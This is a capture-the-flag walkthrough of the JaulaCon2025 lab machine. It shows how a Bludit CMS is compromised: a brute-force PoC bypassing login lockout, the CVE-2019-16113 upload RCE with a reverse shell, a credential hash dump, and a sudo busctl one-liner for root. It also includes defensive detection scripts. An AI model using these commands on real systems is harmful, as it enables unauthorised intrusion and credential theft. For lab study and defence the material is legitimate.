TheHackersLabs-JaulaCon2025-Walkthrough
城南花已开

Information Gathering

Service Discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.135 08:00:27:9a:9b:16 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:f0:6f:4b VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.073 seconds (123.49 hosts/sec). 4 responded
export ip=192.168.60.135
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.135:22
Open 192.168.60.135:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-02 16:55 CST
Initiating ARP Ping Scan at 16:55
Scanning 192.168.60.135 [1 port]
Completed ARP Ping Scan at 16:55, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:55
Completed Parallel DNS resolution of 1 host. at 16:55, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:55
Scanning 192.168.60.135 [2 ports]
Discovered open port 80/tcp on 192.168.60.135
Discovered open port 22/tcp on 192.168.60.135
Completed SYN Stealth Scan at 16:55, 0.08s elapsed (2 total ports)
Nmap scan report for 192.168.60.135
Host is up, received arp-response (0.0080s latency).
Scanned at 2025-04-02 16:55:00 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:9A:9B:16 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
Raw packets sent: 3 (116B) | Rcvd: 27 (2.544KB)

Edit the hosts file and add the domain name

echo "$ip jaulacon2025.thl"|sudo tee -a /etc/hosts
192.168.60.135 jaulacon2025.thl

Directory Enumeration

❯ gobuster dir -u http://jaulacon2025.thl -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://jaulacon2025.thl
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: zip,txt,php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 0] [--> http://jaulacon2025.thl/admin/]
/install.php (Status: 200) [Size: 30]
/0 (Status: 200) [Size: 4541]
/robots.txt (Status: 200) [Size: 22]
Progress: 13435 / 280825 (4.78%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 13447 / 280825 (4.79%)
===============================================================
Finished
===============================================================

This tells us the site runs the Bludit CMS,

though we cannot tell which version from this alone.

Brute Force Using a PoC

There is, however, an admin backend login page,

and we can use the following PoC to brute-force the login:

Bludit 3.9.2 - Auth Bruteforce Bypass - PHP webapps Exploit


The username is Jaulacon2025, which appears on the homepage.

Running the script directly gave me an encoding error; a small change to the code to skip the encoding parse error is enough.

This yields the login credentials Jaulacon2025:cassandra

❯ wget https://www.exploit-db.com/download/48942
--2025-04-02 17:17:54-- https://www.exploit-db.com/download/48942
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3458 (3.4K) [application/txt]
Saving to: ‘48942’

48942 100%[=======================================================================>] 3.38K --.-KB/s in 0s

2025-04-02 17:17:55 (206 MB/s) - ‘48942’ saved [3458/3458]

❯ python3 48942.py -l http://jaulacon2025.thl/admin/login.php -u user.txt -p /usr/share/wordlists/rockyou.txt
[*] Bludit Auth BF Mitigation Bypass Script by ColdFusionX

...... (omitted) ......
[←] Brute Force: Testing -> Jaulacon2025:cassandra

[*] SUCCESS !!
[+] Use Credential -> Jaulacon2025:cassandra
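
From the defender's side, the brute force above shows up in the web server's access log as a burst of POST requests to /admin/login.php from a single client address. Bludit's own lockout keys on the X-Forwarded-For header, which this PoC forges, so the web server's client field is the one to count. The script below is an added example, not part of the original walkthrough or the PoC; the log lines, the threshold and the 60-second window are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache combined-format access log lines (sample data, not from the original page).
SAMPLE_LOG = """\
192.168.60.100 - - [02/Apr/2025:17:20:01 +0800] "POST /admin/login.php HTTP/1.1" 200 1032 "-" "python-requests/2.31"
192.168.60.100 - - [02/Apr/2025:17:20:01 +0800] "POST /admin/login.php HTTP/1.1" 200 1032 "-" "python-requests/2.31"
192.168.60.100 - - [02/Apr/2025:17:20:02 +0800] "POST /admin/login.php HTTP/1.1" 200 1032 "-" "python-requests/2.31"
192.168.60.100 - - [02/Apr/2025:17:20:02 +0800] "POST /admin/login.php HTTP/1.1" 200 1032 "-" "python-requests/2.31"
192.168.60.100 - - [02/Apr/2025:17:20:03 +0800] "POST /admin/login.php HTTP/1.1" 200 1032 "-" "python-requests/2.31"
192.168.60.100 - - [02/Apr/2025:17:20:04 +0800] "POST /admin/login.php HTTP/1.1" 302 0 "-" "python-requests/2.31"
192.168.60.50 - - [02/Apr/2025:17:21:10 +0800] "GET /admin/login.php HTTP/1.1" 200 1032 "-" "Mozilla/5.0"
192.168.60.50 - - [02/Apr/2025:17:21:15 +0800] "POST /admin/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# client-ip ident user [timestamp] "METHOD path proto" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    # Returns (ip, timestamp, method, path, status) or None for a non-matching line.
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))

def find_login_bursts(log_text, threshold=5, window_seconds=60, login_path="/admin/login.php"):
    """Return {ip: total_attempts} for every client that POSTs to the login page
    more than `threshold` times inside any sliding window of `window_seconds`.
    The server-side client IP is used on purpose: X-Forwarded-For is attacker-controlled."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] == login_path:
            events[rec[0]].append(rec[1])
    flagged = {}
    for ip, times in events.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # slide the left edge until the window spans at most window_seconds
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 > threshold:
                flagged[ip] = len(times)
                break
    return flagged
```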


This version is also affected by a vulnerability that yields a webshell through file upload:

hg8/CVE-2019-16113-PoC: Bludit >= 3.9.2 - Authenticated RCE (CVE-2019-16113)

Edit the target URL, the account credentials and the reverse shell address in the script

❯ vi CVE-2019-16113.py
❯ python3 CVE-2019-16113.py
[+] Loggin successful.
[+] Token CSRF: 00d70f50355effa354138eb53aa41f4a257e6cad
[!] Error uploading Shell.
[!] Make sure Bludit version >= 3.9.2.
[+] Shell upload succesful.
[+] .htaccess upload succesful.
[+] Command Execution Successful.
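
The ".htaccess upload succesful" line above is what a defender can hunt for afterwards: Bludit's image upload should never leave a .htaccess file, a PHP file, or an image carrying PHP tags in the upload tree. The scanner below is an added example, not from the page or the PoC repository; it assumes the upload directory is bl-content/uploads (an assumed path) and runs against a constructed sample tree.

```python
import os
import re
import tempfile

# Markers that indicate executable PHP inside a file that should only be an image.
PHP_TAG_RE = re.compile(rb"<\?(php|=)")
IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif", ".svg", ".webp"}
PHP_EXTS = {".php", ".phtml", ".phar"}

def scan_uploads(root):
    """Walk an upload directory (e.g. bl-content/uploads, assumed path) and return a
    sorted list of (relative_path, reason) for files the upload feature should never write."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            lower = name.lower()
            ext = os.path.splitext(lower)[1]
            if lower == ".htaccess":
                findings.append((rel, "htaccess in upload dir"))  # can re-enable PHP execution
            elif ext in PHP_EXTS:
                findings.append((rel, "php file in upload dir"))
            elif ext in IMAGE_EXTS:
                with open(full, "rb") as fh:
                    head = fh.read(65536)  # only the first 64 KiB is inspected
                if PHP_TAG_RE.search(head):
                    findings.append((rel, "php tag inside image"))
    return sorted(findings)

def build_demo_tree():
    """Create a throwaway upload directory with constructed sample files (not from the page)."""
    root = tempfile.mkdtemp(prefix="bludit-uploads-")
    def put(rel, data):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    put("thumbnails/photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)   # benign image
    put("pages/cover.jpg", b"\xff\xd8\xff\xe0" + b"<?php echo 'x'; ?>")  # PHP hidden in an image
    put(".htaccess", b"RewriteEngine on\n")                              # rewrite rules in uploads
    put("notes.txt", b"nothing to see")                                  # benign text file
    return root
```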

User Privilege Escalation

Start a listener on the port

We find two users: debian and JaulaCon2025

❯ pwncat-cs -lp 4444
[21:41:22] Welcome to pwncat 🐈! __main__.py:164
[21:42:17] received connection from 192.168.60.135:34594 bind.py:84
[21:42:33] 192.168.60.135:34594: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@JaulaCon2025:/var/www/html$ cat /etc/passwd |grep /bin/bash
root:x:0:0:root:/root:/bin/bash
debian:x:1000:1000:debian,,,:/home/debian:/bin/bash
JaulaCon2025:x:1001:1001::/home/JaulaCon2025:/bin/bash

Information Gathering Again

The user database can be found in bl-content/databases,

and it contains the password hash of the JaulaCon2025 user

(remote) www-data@JaulaCon2025:/var/www/html/bl-content/databases$ cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Admin",
"firstName": "Administrador",
"lastName": "",
"role": "admin",
"password": "67def80155faa894bfb132889e3825a2718db22f",
"salt": "67e2f74795e73",
"email": "",
"registered": "2025-03-25 19:34:47",
"tokenRemember": "",
"tokenAuth": "70b08e65a3fa16d434ca40e603c99e22",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""
},
"Jaulacon2025": {
"firstName": "",
"lastName": "",
"nickname": "",
"description": "",
"role": "author",
"password": "a0fcd99fe4a21f30abd2053b1cf796da628e4e7e",
"salt": "bo22u72!",
"email": "",
"registered": "2025-03-25 19:43:25",
"tokenRemember": "",
"tokenAuth": "d1ed37a30b769e2e48123c3efaa1e357",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"codepen": "",
"instagram": "",
"github": "",
"gitlab": "",
"linkedin": "",
"mastodon": ""
},
"JaulaCon2025": {
"firstName": "",
"lastName": "",
"nickname": "",
"description": "",
"role": "author",
"password": "551211bcd6ef18e32742a73fcb85430b",
"salt": "jejej",
"email": "",
"registered": "2025-03-25 19:43:25",
"tokenRemember": "",
"tokenAuth": "d1ed37a30b769e2e48123c3efaa1e357",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"codepen": "",
"instagram": "",
"github": "",
"gitlab": "",
"linkedin": "",
"mastodon": ""
}
}

Try cracking it on an online site

This yields the credentials JaulaCon2025:Brutales

Try logging in

(remote) www-data@JaulaCon2025:/var/www/html/bl-content/databases$ su JaulaCon2025
Password:
JaulaCon2025@JaulaCon2025:/var/www/html/bl-content/databases$ cd ~
JaulaCon2025@JaulaCon2025:~$ cat user.txt
368409a919088e8707d0617365156184 -
JaulaCon2025@JaulaCon2025:~$

Root Privilege Escalation

The user turns out to have sudo privileges,

so escalate in the usual way

JaulaCon2025@JaulaCon2025:~$ sudo -l
sudo: unable to resolve host JaulaCon2025: Nombre o servicio desconocido
Matching Defaults entries for JaulaCon2025 on JaulaCon2025:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User JaulaCon2025 may run the following commands on JaulaCon2025:
(root) NOPASSWD: /usr/bin/busctl
JaulaCon2025@JaulaCon2025:~$ sudo /usr/bin/busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'
sudo: unable to resolve host JaulaCon2025: Nombre o servicio desconocido
root@JaulaCon2025:/home/JaulaCon2025# cd ~
root@JaulaCon2025:~# cat root.txt
097fac9db83a1806f3355cf95227992a -